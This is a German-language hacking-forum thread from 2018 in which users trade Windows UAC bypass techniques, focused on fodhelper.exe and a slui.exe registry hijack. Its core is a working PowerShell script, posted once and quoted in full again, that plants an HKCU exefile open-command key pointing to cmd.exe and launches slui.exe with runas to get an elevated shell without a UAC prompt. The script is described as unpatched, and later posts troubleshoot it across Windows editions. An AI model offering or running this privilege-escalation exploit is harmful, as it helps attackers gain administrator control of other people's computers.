6 Antworten in diesem Thema

[gr33d]

Die Methode ist zwar schon länger Public aber bis jetzt nicht gefixt.
Quelle ist hier:

Please Login HERE or Register HERE to see this link!

Please Login HERE or Register HERE to see this link!

 
Hier ist eine Implementierung in C++

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

Die Wow64 redirection muss natürlich nur ausgeschaltet werden wenn x86 als Prozessortyp eingestellt hat, da man sonst keinen Zugriff auf den C:\windows\system32 Ordner hat.
 
EDIT: Habe Methode 2 hinzugefügt welche ab win 8.1 funktioniert und AlwaysNotify umgehen kann.

Bearbeitet von gr33d, 14 March 2018 - 04:21 Uhr.

[o0o]

Laut

Please Login HERE or Register HERE to see this link!

funktioniert das aber erst ab Windows 10.

[gr33d]

Hast recht, danke für den Hinweis!

 

 

Fodhelper.exe was introduced in Windows 10 to manage optional features like region-specific keyboard settings. It†™s location is: C:\Windows\System32\fodhelper.exe and it is signed by Microsoft.

[o0o]

Hier ist auch noch ein schöner UAC Bypass, der genauso wie der beliebte eventvwr.exe Bypass funktioniert.
Funktioniert von Windows 8 an, ist noch nicht gepatcht und benötigt nur einen Registry-Write. 
 
 

Please Login HERE or Register HERE to see this link!

 
Kleines PS-Skript zur schnellen Demonstration:

$path   = "HKCU:\Software\Classes\exefile\shell\open\command"
$cmd    = "C:\Windows\System32\cmd.exe"
$target = "C:\Windows\System32\slui.exe"
 
#create registry key & write our to-be-executed file path
New-Item $path -Force | New-ItemProperty -Name '(Default)' -Value $cmd -PropertyType string -Force
#start the process
Start-Process $target -Verb runas
#wait for a bit
Start-Sleep -Seconds 5
#remove the key again
Remove-Item "HKCU:\Software\Classes\exefile\shell\open" -Recurse -Force

Und kleiner Tipp nebenbei: Wenn ihr euch nicht sicher seid, ob ihr gerade eine elevated Shell habt oder nicht: "net session" eingeben. Gibt entweder "Keine Einträge" (meistens) oder eben "Zugriff verweigert".

Bearbeitet von o0o, 13 March 2018 - 14:22 Uhr.

[SK4LL3R]

Hier ist auch noch ein schöner UAC Bypass, der genauso wie der beliebte eventvwr.exe Bypass funktioniert.
Funktioniert von Windows 8 an, ist noch nicht gepatcht und benötigt nur einen Registry-Write. 
 
 

Please Login HERE or Register HERE to see this link!

 
Kleines PS-Skript zur schnellen Demonstration:

$path   = "HKCU:\Software\Classes\exefile\shell\open\command"
$cmd    = "C:\Windows\System32\cmd.exe"
$target = "C:\Windows\System32\slui.exe"
 
#create registry key & write our to-be-executed file path
New-Item $path -Force | New-ItemProperty -Name '(Default)' -Value $cmd -PropertyType string -Force
#start the process
Start-Process $target -Verb runas
#wait for a bit
Start-Sleep -Seconds 5
#remove the key again
Remove-Item "HKCU:\Software\Classes\exefile\shell\open" -Recurse -Force

Und kleiner Tipp nebenbei: Wenn ihr euch nicht sicher seid, ob ihr gerade eine elevated Shell habt oder nicht: "net session" eingeben. Gibt entweder "Keine Einträge" (meistens) oder eben "Zugriff verweigert".

 

also bei mir findet er den Pfad  ("HKCU:\Software\Classes\exefile\shell\open\command") nicht?

[o0o]

Das ist normal, den sollte es auch eigentlich nicht geben, er soll ja eben erstellt werden.
Eigentlich ist "-Force" dazu da dass er eben auch die nicht vorhandenen Keys im Path erstellt.
Funktioniert bei mir auch ohne Probleme, selbst wenn ich "exefile" vorher lösche.

[SK4LL3R]

Das ist normal, den sollte es auch eigentlich nicht geben, er soll ja eben erstellt werden.
Eigentlich ist "-Force" dazu da dass er eben auch die nicht vorhandenen Keys im Path erstellt.
Funktioniert bei mir auch ohne Probleme, selbst wenn ich "exefile" vorher lösche.

ja.... bei Windows 10 Enterprise klappt es nicht. Hab es nur unter Windows 10 Professional zum laufen bekommen. Aber eigentlich dürfte doch kein Unterschied sein?